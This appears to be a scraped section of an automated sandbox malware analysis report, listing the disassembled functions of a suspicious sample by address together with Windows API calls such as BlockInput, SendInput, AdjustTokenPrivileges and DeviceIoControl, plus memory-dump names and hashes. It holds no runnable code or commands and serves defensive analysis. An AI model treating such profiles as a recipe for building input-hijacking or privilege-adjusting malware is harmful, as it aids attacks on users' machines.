                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 000CEA95
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000CEAEF
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 000CEB3C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID:
                            • API String ID: 1682464887-0
                            • Opcode ID: 12b4dbef8d73f3063623411ee842d0c0e80c4113976c7b5b7bf041ee95a94155
                            • Instruction ID: 5cc814e4788b3630ed0ce97b00497e24f92369d4dd4a383fa37481fe2b268426
                            • Opcode Fuzzy Hash: 12b4dbef8d73f3063623411ee842d0c0e80c4113976c7b5b7bf041ee95a94155
                            • Instruction Fuzzy Hash: F1214C35A00618EFCB00EFA5D894EEEFBB8FF49310F1480A9E945A7251DB319955CB50
                            Function 000C702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000C704C
                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 000C708D
                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000C7098
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseControlCreateDeviceFileHandle
                            • String ID:
                            • API String ID: 33631002-0
                            • Opcode ID: 7463d13f10107252b1ef888a9c7330b7196ba9379b4f4e0649de065d02906449
                            • Instruction ID: 7f997abf9ff2c16ff235b94b0a3a34e44369ac346f77d9e185a148c7f4d44bf1
                            • Opcode Fuzzy Hash: 7463d13f10107252b1ef888a9c7330b7196ba9379b4f4e0649de065d02906449
                            • Instruction Fuzzy Hash: 38115E71E00228BFEB108F94EC45FAEBBFCEB45B10F104156F904E7290D7B05A018BA1
                            Function 00086670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: e724cbd9ad203416ba9ba4f019be186fb56c610d0c15f4ea0ff14a96cb0f0d8f
                            • Instruction ID: 8cb9441efa16db87669eca46aa0be929e31d33e9eace77c802294fa252dd334a
                            • Opcode Fuzzy Hash: e724cbd9ad203416ba9ba4f019be186fb56c610d0c15f4ea0ff14a96cb0f0d8f
                            • Instruction Fuzzy Hash: 30A26D75E00219CFCB28DF58C4846ADBBB1FF48314F2681AAE899AB390D7759D81DF50
                            Function 0008DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42745d4a22167568d7c2a52fa95db13eff401ab5559f97e9777e2361727ec014
                            • Instruction ID: d6b6c6aef4ee4cff474dd11797af70bb055a867c7ecd8210d7bacfaab878951d
                            • Opcode Fuzzy Hash: 42745d4a22167568d7c2a52fa95db13eff401ab5559f97e9777e2361727ec014
                            • Instruction Fuzzy Hash: 4B22A070900209DFDB24EF58C490ABEB7F0FF19300F14816AE9969B392D775AD85DB91
                            Function 000CD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,000DC2E2,?,?,00000000,?), ref: 000CD73F
                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,000DC2E2,?,?,00000000,?), ref: 000CD751
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorFormatLastMessage
                            • String ID:
                            • API String ID: 3479602957-0
                            • Opcode ID: 2e8e0a417bd5fe00093038907f211bc2980328034246eaae1896b377acc7110e
                            • Instruction ID: 33cd7cd4bcbba6e7a5a4aa3b956e55069c1d2651002e758599c64c8c8cf5d43b
                            • Opcode Fuzzy Hash: 2e8e0a417bd5fe00093038907f211bc2980328034246eaae1896b377acc7110e
                            • Instruction Fuzzy Hash: AAF0823510432DABDB21AFA4DC49FEE776CBF49351F008125B945D6181D670D940CBA1
                            Function 000C4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000C4B89
                            • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 000C4B9C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: InputSendkeybd_event
                            • String ID:
                            • API String ID: 3536248340-0
                            • Opcode ID: ca4895b92b38a2ab6b933253b0631ad91802f710e42ef95246e7903dd6051303
                            • Instruction ID: b659f17316fee785b057b23b22e42884e2c36c09a8ff5af802329012dc7206eb
                            • Opcode Fuzzy Hash: ca4895b92b38a2ab6b933253b0631ad91802f710e42ef95246e7903dd6051303
                            • Instruction Fuzzy Hash: 4EF06D7080024DAFDB058FA0C805BBE7BB4BF00305F008409FD55A5191D3B9CA129F90
                            Function 000BB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000BB9EC), ref: 000BB8C5
                            • CloseHandle.KERNEL32(?,?,000BB9EC), ref: 000BB8D7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AdjustCloseHandlePrivilegesToken
                            • String ID:
                            • API String ID: 81990902-0
                            • Opcode ID: f88c7263483e571a971202029017dd063e62d6f63512fb7e3e816476ca41ea7b
                            • Instruction ID: 656b5468c391125b51bc6c788ec8da4910f08b9c609b3d669444ca48ad9e0e7c
                            • Opcode Fuzzy Hash: f88c7263483e571a971202029017dd063e62d6f63512fb7e3e816476ca41ea7b
                            • Instruction Fuzzy Hash: 20E0B672004611AFE7262BA0FC09DB77BEDEF05311B10C869F49A81871DBA2ACD0DB50
                            Function 000A8E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,0008125D,000A7A43,00080F35,?,?,00000001), ref: 000A8E41
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000A8E4A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 90c94512f0bcba012205f9ad7a6ab19f5c115a548da22026c6a6a7e235222aea
                            • Instruction ID: ca757726cbd0d848fb1534266c5518236c724273a3fcc05084cb5faa86150908
                            • Opcode Fuzzy Hash: 90c94512f0bcba012205f9ad7a6ab19f5c115a548da22026c6a6a7e235222aea
                            • Instruction Fuzzy Hash: E1B092B1044A08ABEA102BE1FC0DB883F68FB08A62F014010F65D488608BA354908A92
                            Function 00A4F2F3 Relevance: 2.4, Strings: 1, Instructions: 1119COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID: %
                            • API String ID: 0-2567322570
                            • Opcode ID: f94690d1ecf2e732529bbeba7c7fe293983b85516b3626b52e916ef24d266752
                            • Instruction ID: 3b7484aa1192d43d2572aafe95670abc2da593f10597f586197f30284b75dac2
                            • Opcode Fuzzy Hash: f94690d1ecf2e732529bbeba7c7fe293983b85516b3626b52e916ef24d266752
                            • Instruction Fuzzy Hash: 81B2AB6180D3D54FDB178B748868695BF70AF2B310F4A41DFC0C59F5A3E2694946DB23
                            Function 000B113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 66575ee6b0300915cbb564a84c885041751d89ea2598255cb538e4f413c63261
                            • Instruction ID: ac7487c781a81935c48f86e8fdfbdf9bdad3c2101a83a59774bc6bab6a20e53a
                            • Opcode Fuzzy Hash: 66575ee6b0300915cbb564a84c885041751d89ea2598255cb538e4f413c63261
                            • Instruction Fuzzy Hash: 02B1CE20E2AF508DD72396398931336B65DAFBB2D5F91D71BFC2A74D62EB2185C34180
                            Function 000D703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • BlockInput.USER32(00000001), ref: 000D7057
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BlockInput
                            • String ID:
                            • API String ID: 3456056419-0
                            • Opcode ID: f034bd753e2b9a7e406396252ed96dbf81f873c9953b6b8be6f4852cc58bf4f0
                            • Instruction ID: af05570ebaf2fea8898a94cac4da3d828c161dba0458febc68ff42fb9b2548e1
                            • Opcode Fuzzy Hash: f034bd753e2b9a7e406396252ed96dbf81f873c9953b6b8be6f4852cc58bf4f0
                            • Instruction Fuzzy Hash: B2E048352043049FD710EFA9D405D96F7ECAF54760F018427F949D7392EAB0EC409BA0
                            Function 000FC146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            • API String ID: 2645101109-0
                            • Opcode ID: e71875e62cd1fe995c2c5388489e192ec13abab1fb6c15ac3b1329521c694422
                            • Instruction ID: 9fe455209e3d1aa1c16f286f4a20d31e61120b21ee63111617c8b46b5d1e050b
                            • Opcode Fuzzy Hash: e71875e62cd1fe995c2c5388489e192ec13abab1fb6c15ac3b1329521c694422
                            • Instruction Fuzzy Hash: 07C04CB140400DDFD715CBD0D9459EFB7BCBB04300F104095A255E1400D7709B459F72
                            Function 000A8E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 000A8E1F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: fb812f6ecffe6f5aceea6523890aa8078135daba20268ff8a072c913fb086148
                            • Instruction ID: bda430d4368b992b566eeef9a1d386fa0da13d0691bd3c9b36e7f4604703a006
                            • Opcode Fuzzy Hash: fb812f6ecffe6f5aceea6523890aa8078135daba20268ff8a072c913fb086148
                            • Instruction Fuzzy Hash: 02A0247000050CF7CF001FD1FC044447F5CF7041507004010F40C04431C773545045C1
                            Function 000AA937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(000A6AE9,001367D8,00000014), ref: 000AA937
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            • Opcode ID: f87950fd42d656db63e3b399c1073a240ccd406629524e1f4cf927a2385c1cf2
                            • Instruction ID: 513677bc31f4270ea5210b367830deb977d5c2b947a99526f3c65c2493bb15ea
                            • Opcode Fuzzy Hash: f87950fd42d656db63e3b399c1073a240ccd406629524e1f4cf927a2385c1cf2
                            • Instruction Fuzzy Hash: B3B012B43031024BD7084B79FC5411A3AD4574E101301503D7047C2D70DF308490DF00
                            Function 000A0EC4 Relevance: .3, Instructions: 345COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                            • Instruction ID: cd08329b70995c95bb7f9a3fc02ac8db0d9648f404d20b45fd54868d4d81467d
                            • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                            • Instruction Fuzzy Hash: 63C1D17220519349DFAD86BAC47457EFAE15BB37B131A076DD8B3CB4C0EE24C568D620
                            Function 000A12F9 Relevance: .3, Instructions: 341COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                            • Instruction ID: dfa06fcf84fcafd9cc2026027f1de1b21bb1101dfc2bf2e0755e1473229e25c1
                            • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                            • Instruction Fuzzy Hash: 25C1B2722091934ADFAD46BAC47447EBAE15BB37B131A476DD8B3CB4C4EE24C528D620
                            Function 000A0A8F Relevance: .3, Instructions: 331COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                            • Instruction ID: 601d1a9818c95e811262ca3e8186767aa341e83ff8bcf2872513de6c96bc747e
                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                            • Instruction Fuzzy Hash: BDC1C1722052974ADFAD86BAC47443EFAE15BB37B531A476DD4B3CB4C0EE24C528D620
                            Function 000A0677 Relevance: .3, Instructions: 323COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction ID: 5db70b7d107408793cdfe594186d331c331d52941c92c7eb556b9d7e70f1e021
                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction Fuzzy Hash: 73C1CF722091974AEFAD46BA847443EBBE15FB37B131A476DD4B3CB4C1EE24D528C620
                            Function 00A52FD8 Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                            • Instruction ID: c22ed3f6b7be15ab05023d67e278a27b41ddefff64cdbbcc2f35e191e5dad172
                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                            • Instruction Fuzzy Hash: 6941B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                            Function 00A52E68 Relevance: .0, Instructions: 35COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                            • Instruction ID: a84f1311bcc02f36e82055506c0dcb132950f62bf622502f7170932cb57f8bd2
                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                            • Instruction Fuzzy Hash: 4A019278A10109EFCB44DF98C5919AEFBB5FF98310F208599EC09A7301D730AE41DB80
                            Function 00A52EC8 Relevance: .0, Instructions: 35COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                            • Instruction ID: 825778efa66e1e2b0c94b5c247b31d38d91972c3678d4e673f018f557fc24f9a
                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                            • Instruction Fuzzy Hash: 95019279A00109EFCB44DF98D5909AEF7B5FF59310F208599EC09A7705D730AE55DB80
